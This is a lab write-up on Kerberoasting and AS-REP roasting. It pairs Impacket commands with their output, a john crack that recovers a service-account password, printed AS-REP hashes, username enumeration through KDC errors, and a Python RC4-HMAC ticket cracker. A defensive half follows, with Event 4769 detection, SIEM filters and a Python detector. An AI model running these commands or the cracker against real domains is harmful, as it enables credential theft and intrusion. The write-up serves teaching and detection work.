Kerberoasting

Kerberoasting Basics

Kerberos is a protocol for authentication used in Windows Active Directory environments (though it can be used for auth to Linux hosts as well). In 2014, Tim Medin presented an attack on Kerberos he called Kerberoasting. It’s worth reading through the presentation, as Tim uses good graphics to illustrate the process, but I’ll try to give a simple overview.

When you want to authenticate to a service using Kerberos, you present your TGT to the domain controller (acting as the KDC) and name the service principal (SPN) you want to reach. The DC answers with a service ticket whose encrypted part is protected with the long-term key of the account that runs that service, a key derived from that account's password. You hand the ticket to the service, which decrypts it with its own key, reads who you are, and decides whether to let you in. The DC does not check whether you have any business with that service: any authenticated domain user can request a ticket for any SPN in the domain.

In a Kerberoasting attack, rather than presenting the ticket to the service, you keep its encrypted part and crack the service account's password offline: guess a password, derive the key from it, and check whether the ticket decrypts and its integrity check verifies. No traffic ever reaches the service, and the domain controller sees nothing but an ordinary ticket request.

Most of the time you need a valid domain account to Kerberoast, because the service ticket request (TGS-REQ) has to carry a TGT. The related attack that needs no account is AS-REP roasting: if a user account has the UserAccountControl flag "Do not require Kerberos preauthentication" set, the DC will hand anyone an AS-REP for that user, and the portion of that reply encrypted with the user's key can be cracked offline in the same way. Method-2 below is this variant.

Method-1

Now let's get the SPNs with Impacket's GetUserSPNs.py, authenticating as the domain account SVC_TGS. The script identified one user with an SPN, Administrator, and with -request it pulled a service ticket for that SPN:

┌──(kali㉿kali)-[~/Desktop]
└─$ locate GetUserSPNs.py                                                                             
/usr/share/doc/python3-impacket/examples/GetUserSPNs.py
                                                                                                                                                                       
┌──(kali㉿kali)-[~/Desktop]
└─$ python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS -save -outputfile GetUserSPNs.out
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2023-07-21 02:36:10.518169             



[-] CCache file is not found. Skipping...

So we have a ticket, written by -outputfile in the $krb5tgs$23$ line format that john and hashcat understand. Now let's crack it with john:

┌──(kali㉿kali)-[~/Desktop]
└─$ john -w=/usr/share/wordlists/rockyou.txt GetUserSPNs.out 
Created directory: /home/kali/.john
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)     
1g 0:00:00:11 DONE (2023-07-22 10:07) 0.08673g/s 913917p/s 913917c/s 913917C/s Tiffani1432..Tiago_18
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
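
What john is doing with that krb5tgs hash, as an added example that is not part of this write-up and not Impacket's or john's own code: the ticket's encrypted part is RC4-HMAC (etype 23), so the key is simply the service account's NT hash and each guess costs one MD4 plus a few HMAC-MD5 and RC4 operations. The block builds a ticket for a made-up service account, SPN and password (svc_sql, MSSQLSvc/sql01.corp.local, "Winter2023!"), writes it in the same $krb5tgs$23$ line format Impacket produced above, and cracks it against a constructed wordlist. MD4 is implemented by hand because hashlib's md4 is frequently disabled on current systems.

```python
import hmac
import os
import struct
from hashlib import md5


def md4(data):
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is usually unavailable under OpenSSL 3."""
    mask = 0xFFFFFFFF
    rol = lambda x, n: ((x << n) | (x >> (32 - n))) & mask
    rounds = (  # (mixing function, round constant, word order, shift schedule)
        (lambda x, y, z: (x & y) | (~x & z), 0, range(16), (3, 7, 11, 19)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg)) % 64) + struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for func, k, order, shifts in rounds:
            for i, w in enumerate(order):
                a = rol((a + func(b, c, d) + x[w] + k) & mask, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate registers so the next step updates "a"
        state = [(s + v) & mask for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password):
    """The RC4-HMAC Kerberos key IS the NT hash: MD4 of UTF-16LE, no salt, no iterations."""
    return md4(password.encode("utf-16le"))


def rc4(key, data):
    s, j = list(range(256)), 0
    for i in range(256):  # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:  # keystream generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


KU_TGS_REP_TICKET = 2  # RFC 4120 key-usage number for a ticket's enc-part


def rc4_hmac_encrypt(key, usage, plaintext):
    """RFC 4757 encryption: checksum || RC4(confounder || plaintext)."""
    k1 = hmac.new(key, struct.pack("<I", usage), md5).digest()
    p = os.urandom(8) + plaintext
    checksum = hmac.new(k1, p, md5).digest()
    k3 = hmac.new(k1, checksum, md5).digest()
    return checksum + rc4(k3, p)


def rc4_hmac_verify(key, usage, blob):
    """Decrypt with a candidate key; the HMAC over the recovered plaintext says if it was right."""
    checksum, edata = blob[:16], blob[16:]
    k1 = hmac.new(key, struct.pack("<I", usage), md5).digest()
    k3 = hmac.new(k1, checksum, md5).digest()
    return hmac.compare_digest(hmac.new(k1, rc4(k3, edata), md5).digest(), checksum)


def to_krb5tgs(user, realm, spn, blob):
    """Impacket/john/hashcat line: $krb5tgs$23$*user$REALM$spn*$checksum$edata."""
    return f"$krb5tgs$23$*{user}${realm}${spn}*${blob[:16].hex()}${blob[16:].hex()}"


def from_krb5tgs(line):
    head, tail = line.split("*$", 1)
    user, realm, spn = head[len("$krb5tgs$23$*"):].split("$", 2)
    checksum, edata = tail.split("$", 1)
    return user, realm, spn, bytes.fromhex(checksum) + bytes.fromhex(edata)


def crack(line, wordlist):
    """Offline guess loop: one MD4, two HMAC-MD5s and one RC4 per candidate, nothing on the wire."""
    _, _, _, blob = from_krb5tgs(line)
    for candidate in wordlist:
        if rc4_hmac_verify(nt_hash(candidate), KU_TGS_REP_TICKET, blob):
            return candidate
    return None


# Constructed demo ticket: made-up service account, SPN, realm and password.
DEMO_PASSWORD = "Winter2023!"
DEMO_LINE = to_krb5tgs("svc_sql", "CORP.LOCAL", "MSSQLSvc/sql01.corp.local~1433",
                       rc4_hmac_encrypt(nt_hash(DEMO_PASSWORD), KU_TGS_REP_TICKET,
                                        b"<ASN.1 EncTicketPart would sit here>"))
DEMO_WORDLIST = ["password", "Summer2023!", "Ticketmaster1968", "Winter2023!", "P@ssw0rd"]

if __name__ == "__main__":
    print(DEMO_LINE[:64] + "...")
    print("cracked:", crack(DEMO_LINE, DEMO_WORDLIST))
```

The verify step is why the attack needs no contact with the service: the checksum inside the blob is an HMAC under the password-derived key, so a right guess proves itself locally. The same primitive with a different key-usage number handles the AS-REP hashes from Method-2, and an AES ticket (etype 0x12) would replace the single MD4 with a PBKDF2 derivation of 4096 iterations, which is the whole reason the detection section below keys on 0x17.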

Method-2

Impacket's GetNPUsers.py handles the pre-authentication variant (AS-REP roasting). If the DC allows anonymous LDAP binds, as it did here, it runs with no username or password at all: it searches LDAP for accounts with UF_DONT_REQUIRE_PREAUTH set (the UAC value 0x410200 shown below includes that 0x400000 flag) and, with -request, fetches an AS-REP for each and prints it in crackable form. The e-mail-looking prefix on the hash lines below is an extraction artifact; in its default (hashcat) output format the tool prints $krb5asrep$23$<user>@<REALM>:<checksum>$<edata>.

┌──(kali㉿kali)-[~/Desktop]
└─$ impacket-GetNPUsers -dc-ip 10.10.10.161 -request htb.local/                     
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Name          MemberOf                                                PasswordLastSet             LastLogon                   UAC      
------------  ------------------------------------------------------  --------------------------  --------------------------  --------
svc-alfresco  CN=Service Accounts,OU=Security Groups,DC=htb,DC=local  2023-07-28 12:45:03.309423  2023-07-28 12:44:55.272027  0x410200 



[email protected]:caf2f3add954f9ac9f9b3e7a3d391bc4$db3f3fbc72a599266f8fa30d31498245fe3d01211185557a282f2d40e544ff92fddd7fb472a89bf67eee3556c662e4df672e24d4a2a03c1ab3eee44ed74cba22473993f8284916b09a768cb68beee16973cf493fab978d6befaee38f69418f23dc477cb37f8d28655eb4c0dc6a61ce9e9a520f6a423571540c379c06c0abcb29ce7b7a6b884f155e7548a67023d362fdd3028695cc3f7ffc45af8f97eac9f4ed3a6c85579151db03a78ff4970d252e9029fd5d4bca6513dd8ab2934cc2ad7369a489997b7c7ad288fa00454f47bc803e5f465b429d3e301069d700d468a2ebe291ccf36025b4

If the DC does not allow anonymous enumeration but we have candidate usernames, we can feed them with -usersfile and -no-pass. The tool then sends an AS-REQ without pre-authentication for each name, so the KDC's error also tells us which names exist: KDC_ERR_C_PRINCIPAL_UNKNOWN for unknown accounts, KDC_ERR_CLIENT_REVOKED for disabled or locked ones, and "doesn't have UF_DONT_REQUIRE_PREAUTH set" for valid accounts that are protected. That makes this a username-enumeration technique as well:

┌──(kali㉿kali)-[~/Desktop]
└─$ impacket-GetNPUsers -dc-ip 10.10.10.161 -request -no-pass -usersfile users.txt  htb.local/
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
[email protected]:301c9624aa2bd72f0676f909bb8ed6d7$f8930992b43a7465445dc7580a9698908b172b1b53cb2f101f3fcd67a40f3bb2f52ab4e73f97521f338c59d483dfe889ca8a2f98fd23956bd2a4ecf37bf401b64b27838a094cbb8ceb266d1acb6b469f7b6c6cff984daa9d12ea949db6a55041e9956b8d969cc1ea5c2e7518a6e5aaaecd24e4337a5cae197e5e156d0010689f7b3dac8873053c000a0a30de30223274338b8dee02d4673dee6c81670e8a2377fda9baa3caf32d54f3d51ca3ea14cceeeb99fda5da1829535888da9d8e61d79e030137a2e995202ea4ecc9e4f3c215054f2e303037b51f2e5e0a1b07e0a26a1682316a0b1ded
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User l0v3 doesn't have UF_DONT_REQUIRE_PREAUTH set

_______________________________________________________________

Detecting a Kerberoasting Attack

For this Sherlock (a Hack The Box forensics exercise) we have prefetch files from the workstation and the event logs from the domain controller.

Windows Prefetch speeds up application launches: the first time an executable runs, Windows records which files it touched, and on later launches it pre-loads them. For forensics, that record (a .pf file under C:\Windows\Prefetch) tells us that a particular executable was run, when it was last run (on Windows 8 and later, up to the last eight run times), how many times it ran, and which files and paths it loaded during execution. We will use PECmd by Eric Zimmerman to parse the prefetch files and Event Viewer to go through the event logs.

C:\Users\Hp\Downloads\Compressed\PECmd\PECmd.exe -d "C:\Users\Hp\Downloads\campfire-1\Triage\Workstation\2024-05-21T033012_triage_asset" --csv . --csvf output.csv

Analyzing Domain Controller Security Logs

The Security log on a domain controller records Event ID 4769 ("A Kerberos service ticket was requested") whenever a service ticket is requested, which is exactly the request a Kerberoast makes.

Open the event file of the domain controller.

Filter by the event ID

We still get a lot of events.

Understanding a Kerberos ticket request

Here we can see that Account Name "DC01$" requested a service ticket for the service named DC01$. In Windows, names ending with $ are computer (machine) accounts; a service name of DC01$ means the ticket was for a service running under the DC01 computer account itself.

This all belongs to normal Active Directory operations. Below that we can see a field named "Ticket Encryption Type" with the value 0x12, which is AES256-CTS-HMAC-SHA1-96.

In a current domain, legitimate ticket requests use 0x12 or 0x11 (AES128-CTS-HMAC-SHA1-96). One caveat: a service account whose msDS-SupportedEncryptionTypes does not include AES still gets RC4 tickets legitimately, so 0x17 is a lead to run down, not proof on its own.

But if we see encryption type 0x17, RC4-HMAC, that is a clue to look further, because an attacker asks for RC4 on purpose: the RC4 ticket key is simply the NT hash (an unsalted MD4 of the password), so each guess costs one MD4 and a couple of HMAC-MD5s, whereas AES keys come from PBKDF2 with 4096 iterations and crack orders of magnitude more slowly.

The common open-source tools request RC4 by default: Impacket's GetUserSPNs.py and Rubeus's kerberoast both do, which is what produced the etype 23 hash in Method-1. Rubeus can be told to request AES tickets instead (/aes), so an encryption-type filter alone will not catch every Kerberoast.

To further reduce the chances of false positives, we can filter out requests from other service accounts and machine accounts.

Service accounts request service tickets from domain controllers all the time; that's the nature of how service accounts work. To further reduce the events to investigate, we can filter out requests whose service name ends with "$": those are computer accounts, and tickets for them are Windows doing its own housekeeping. Requests for the krbtgt service (TGT renewals) can be dropped for the same reason.

Now we search the remaining events for the 0x17 encryption type.

We can see that a domain Account “alonzo.spire” requested a ticket for a service name “MSSQLService” with an encryption type of 0x17 from a workstation with IP Address 172.17.79.129.

Notice that both the account name and service name do not end with $.

For SIEMs

SOC analysts can query the logs in SIEMs to create a filter for all the things mentioned.

With the filters discussed above we’re snooping for a 4769 event where:

1. An account name that is NOT a service or machine account (one that does not end with $), so an ordinary domain user account. This is the compromised account from which the attacker performed the attack.

2. Service Names that do NOT end with $.

3. Ticket encryption type will be 0x17 which is RC4 encryption, allowing attackers to easily crack the hash.
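
The three filters above as code, run over a handful of 4769 records, as an added example that is not from the original write-up. The records are constructed inline to mirror the fields the text describes (the realm CORP.LOCAL, the hosts, the times and all IPs except the workstation's are made up); a real feed would come from a SIEM export or Get-WinEvent. Two checks the list does not spell out are included: the request must have succeeded (Status 0x0, otherwise no ticket was issued) and krbtgt is skipped, because TGT renewals also log 4769 and are not Kerberoastable.

```python
import xml.etree.ElementTree as ET
from collections import defaultdict

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}


def parse_4769(xml_text):
    """Flatten one Security-log event (as Event Viewer's XML view shows it) into a dict."""
    root = ET.fromstring(xml_text)
    ev = {d.get("Name"): (d.text or "") for d in root.find("e:EventData", NS)}
    ev["EventID"] = int(root.find("e:System/e:EventID", NS).text)
    ev["TimeCreated"] = root.find("e:System/e:TimeCreated", NS).get("SystemTime")
    return ev


def is_roast_candidate(ev):
    """The three SIEM filters from the text, plus success-only and no krbtgt."""
    if ev["EventID"] != 4769 or ev.get("Status", "0x0") != "0x0":
        return False                                   # failed request: no ticket issued
    account = ev["TargetUserName"].split("@", 1)[0]    # "user@REALM" -> "user"
    service = ev["ServiceName"]
    if account.endswith("$") or service.endswith("$"):
        return False                                   # computer/machine accounts
    if service.lower() == "krbtgt":
        return False                                   # TGT renewal, not an SPN
    return ev["TicketEncryptionType"].lower() == "0x17"  # RC4-HMAC


def find_kerberoasting(xml_events):
    """Return the matching events plus a per-account roll-up (what to triage first)."""
    hits = [ev for ev in map(parse_4769, xml_events) if is_roast_candidate(ev)]
    rollup = defaultdict(lambda: {"services": set(), "sources": set(), "first": None})
    for ev in hits:
        r = rollup[ev["TargetUserName"].split("@", 1)[0]]
        r["services"].add(ev["ServiceName"])
        r["sources"].add(ev["IpAddress"].replace("::ffff:", ""))  # strip IPv4-mapped prefix
        r["first"] = min(filter(None, (r["first"], ev["TimeCreated"])))
    return hits, {a: {"services": sorted(r["services"]), "sources": sorted(r["sources"]),
                      "first": r["first"], "count": len(r["services"])} for a, r in rollup.items()}


def event(time, user, service, etype, ip, status="0x0"):
    """Constructed 4769 record; realm, hosts and times are made up for the demo."""
    return f"""<Event xmlns="{NS['e']}">
  <System><EventID>4769</EventID><TimeCreated SystemTime="{time}"/></System>
  <EventData>
    <Data Name="TargetUserName">{user}</Data><Data Name="TargetDomainName">CORP.LOCAL</Data>
    <Data Name="ServiceName">{service}</Data><Data Name="TicketEncryptionType">{etype}</Data>
    <Data Name="IpAddress">::ffff:{ip}</Data><Data Name="Status">{status}</Data>
  </EventData>
</Event>"""


# Constructed sample: DC self-request, TGT renewal, a roast burst, a legitimate AES
# request from another account, and a failed RC4 request for a non-existent SPN.
SAMPLE_EVENTS = [
    event("2024-05-21T03:18:01Z", "DC01$@CORP.LOCAL", "DC01$", "0x12", "172.17.79.4"),
    event("2024-05-21T03:18:05Z", "alonzo.spire@CORP.LOCAL", "krbtgt", "0x12", "172.17.79.129"),
    event("2024-05-21T03:18:09Z", "alonzo.spire@CORP.LOCAL", "MSSQLService", "0x17", "172.17.79.129"),
    event("2024-05-21T03:18:09Z", "alonzo.spire@CORP.LOCAL", "HTTP/web01.corp.local", "0x17", "172.17.79.129"),
    event("2024-05-21T03:18:12Z", "svc_backup@CORP.LOCAL", "MSSQLService", "0x12", "172.17.79.50"),
    event("2024-05-21T03:18:20Z", "alonzo.spire@CORP.LOCAL", "CIFS/fs01.corp.local", "0x17", "172.17.79.129", "0x7"),
]

if __name__ == "__main__":
    hits, rollup = find_kerberoasting(SAMPLE_EVENTS)
    for account, info in rollup.items():
        print(f"{account}: {info['count']} SPN(s) {info['services']} from {info['sources']} first {info['first']}")
```

The roll-up matters more than the individual hits: a real user touches one or two SPNs in a session, while a roasting tool asks for every SPN in the domain within a few seconds from one source address, so "distinct RC4 service names per account per minute" is the number to alert on.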

The follow-up to this detection would be to:

  1. Create a timeline of when this event was generated.

  2. Do a forensic analysis of the machine with IP Address 172.17.79.129, and find out how the “alonzo.spire” user account got compromised.

  3. We can use artifacts like Sysmon process-creation logs (Event ID 1) if available, prefetch, LNK files, the NTFS Master File Table ($MFT), or the registry to gain insight into what happened around the time the Kerberoasting activity was logged.

Analyzing PowerShell logs

We can see executed commands and scripts by filtering the Microsoft-Windows-PowerShell/Operational log for event ID 4104 (script block logging).

Looking through those events, we can see that PowerView was used.

Exploring Timeline

Now we can use Timeline Explorer to look at the actual timeline of the event, loading the CSV file generated from the prefetch files.

We should look for any execution around the timeline we have established so far. Let's filter for the date of the incident to reduce the noise by adding a filter on the "Last Run" field.

Looking at the last run timestamps, we find an exe was executed just a second before our malicious events were logged on the Domain Controller.

This is a Kerberos abuse tool. One that's common in Active Directory pentesting or offensive operations. To get the full path of the file, go to the files loaded and double-click to see all files loaded by this tool at execution.

You can check the last run column to see when was the tool actually run.
